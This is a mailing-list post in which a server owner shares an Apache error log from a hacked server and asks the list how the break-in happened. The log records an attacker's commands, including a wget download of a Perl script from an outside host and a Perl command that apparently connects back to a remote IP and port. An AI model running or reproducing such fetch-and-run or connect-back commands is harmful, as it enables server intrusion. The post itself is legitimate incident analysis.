Security Basics mailing list archives
Analys of an apache log following a hack.
From: Gregory Boddin <gregory () g2f be>
Date: Tue, 10 Apr 2007 12:11:58 +0200
Hello, it's my first mail to the security focus mailing list. First thanks for this community and your attention.Well my server was hacked 1 week ago, and I find that in the apache error_log.
The system was cleaned after that but I want to know more about this. I think that someone have used a buffer overflow in httpd (apache) server. Confirm that? Thank you very much for answer. (excuse my english because I m french) [APACHE ERROR LOG][Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@*****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36-- http://www.r00ting.org/b => `b' Resolving www.r00ting.org... 200.226.246.22 Connecting to www.r00ting.org|200.226.246.22|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27,606 (27K) [text/plain]0K .......... .......... ...... 100% 41.93 KB/s
00:05:37 (41.93 KB/s) - `b' saved [27606/27606]% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 27606 100 27606 0 0 5315 0 0:00:05 0:00:05 --:--:-- 72383
sh: lynx: command not found sh: fetch: command not found --00:22:32-- http://www.r00ting.org/b => `b' Resolving www.r00ting.org... 200.226.246.22 Connecting to www.r00ting.org|200.226.246.22|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27,606 (27K) [text/plain]0K .......... .......... ...... 100% 58.23 KB/s
00:22:34 (58.23 KB/s) - `b' saved [27606/27606]% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 27606 100 27606 0 0 33291 0 --:--:-- --:--:-- --:--:-- 60817
sh: lynx: command not found sh: fetch: command not found Undefined subroutine &main::getnick called at b line 304.sh: line 1: 5148 Killed perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal operations [Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sh: /cd: No such file or directory sh: /cd: No such file or directorysendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sh: /cd: No such file or directory sh: /cd: No such file or directory sh: /cd: No such file or directory[Thu Apr 05 15:18:35 2007] [warn] child process 10245 still did not exit, sending a SIGTERM [Thu Apr 05 15:18:35 2007] [warn] child process 10246 still did not exit, sending a SIGTERM [Thu Apr 05 15:20:56 2007] [notice] Apache configured -- resuming normal operations [Thu Apr 05 16:10:09 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message headersendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Fri Apr 06 22:10:26 2007] [notice] caught SIGTERM, shutting down[Fri Apr 06 22:45:56 2007] [notice] Apache configured -- resuming normal operations [Fri Apr 06 23:50:46 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Sun Apr 08 00:43:49 2007] [notice] caught SIGTERM, shutting down[Sun Apr 08 00:48:00 2007] [notice] Apache configured -- resuming normal operations [Sun Apr 08 02:52:34 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
[/APACHE ERROR LOG] Thank you. Greg
Current thread:
- Analys of an apache log following a hack. Gregory Boddin (Apr 10)
- Re: Analys of an apache log following a hack. Santiago Barahona (Apr 11)